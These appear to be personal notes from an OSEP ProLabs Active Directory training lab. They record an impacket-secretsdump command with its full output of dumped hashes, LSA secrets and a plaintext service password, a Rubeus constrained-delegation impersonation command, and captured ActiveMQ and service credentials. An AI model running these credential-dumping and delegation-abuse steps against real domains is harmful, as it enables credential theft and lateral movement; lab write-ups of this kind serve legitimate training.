Cybernetics | Notion

got access to Database link.

got creds of svc_sql

username: svc_sql
hash: e04c4ef54a1a6f4e4fc0de22f0b5fb2d
password: m3c.local\\svc_sql:ef8Mahvae2j1

┌──(remo㉿Remo)-[~/Offsec/OSEP/ProLabs/Cybernetics]
└─$ proxychains -q impacket-secretsdump m3c.local/svc_sql:''@10.9.20.11 -hashes :e04c4ef54a1a6f4e4fc0de22f0b5fb2d
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x2aa1b3c2027d47c1a8432f8d2e455268
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:499a6ee61a43b250ee988b9d34e3c95f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
remo:1001:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
[*] Dumping cached domain logon information (domain/username:hash)
M3C.LOCAL/Administrator:$DCC2$10240#Administrator#5c7435888a64e08c8bab7d82947fcb54: (2024-03-13 12:29:35)
M3C.LOCAL/svc_sql:$DCC2$10240#svc_sql#5fc66e8b320b1d2e75ca81cfa4e4a36d: (2024-11-29 06:00:01)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
M3C\\M3SQLW$:aes256-cts-hmac-sha1-96:f1fd7d6f22b308de0f838bc56e54069bf822de8054d0555f1cbb9072aace9429
M3C\\M3SQLW$:aes128-cts-hmac-sha1-96:d7ec3b6a6112a29454919903b8082aba
M3C\\M3SQLW$:des-cbc-md5:ef9885490ea29e64
M3C\\M3SQLW$:plain_password_hex:400066006900640054007000280028007a004c007a002c00560072007a0029005b004e0040003e003c0024003e00770054002400380023004e005a00600028004c0054004c00400059005d006000350074003a0052002e007900390036006c00360058002b003300590055004c00520075003d0044005f00430032003c003c002c0070005c003a00400077002a0076002b00440048005300520033006000650068004d0023002800710038006d004600640037003b004d002f007200250034002a004f007400530050006e0074007300700036004b003900400062004f004b0031005f00670071006b00500045007500
M3C\\M3SQLW$:aad3b435b51404eeaad3b435b51404ee:a09cbeb5c0e16d1e926c5b3d884949a4:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x4246de325df11b035c75ae3855b435de60d18cd7
dpapi_userkey:0x75bd3ff4aa4d5c2ee4694a2d43b7d8af2c6d78a7
[*] NL$KM 
 0000   D8 33 7F 7B A3 2C DE 15  CF B4 9A 10 37 3F 6B A9   .3.{.,......7?k.
 0010   4E 49 46 70 57 27 E8 1E  E8 A9 11 A8 1D EF 19 0C   NIFpW'..........
 0020   CC 43 92 F3 9C C7 51 1A  06 56 6D 60 DA 73 22 74   .C....Q..Vm`.s"t
 0030   81 EC B4 9F 69 FC 6A 8A  C8 52 E6 F5 03 56 0D 59   ....i.j..R...V.Y
NL$KM:d8337f7ba32cde15cfb49a10373f6ba94e4946705727e81ee8a911a81def190ccc4392f39cc7511a06566d60da73227481ecb49f69fc6a8ac852e6f503560d59
[*] _SC_MSSQL$SQLEXPRESS 
m3c.local\\svc_sql:ef8Mahvae2j1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

now let’s abuse the constrained delegation.

abused

Rubeus.exe s4u /user:svc_sql /aes256:DC34E2C3A61B51A3D4F4E119A220E13EB575BAB477977802C1F8CAD4ED89FDCF /impersonateuser:Micheal.Crosley /domain:m3c.local /msdsspn:time/m3webaw.m3c.local /dc:m3dc.m3c.local /altservice:http /nowrap

now getting the username and password from activemq at m3web

activemq.username=system
activemq.password=manager
guest.password=password

logged in for apachemq

username: admin
password: 3f18DV^t!svBV4ntcrLRTWi2XaMCDK

got access of the apache service

username: svc_apache
password: ef8Mahvae2j2
hash: b266d8902ae30ec65abdfbe28d34c819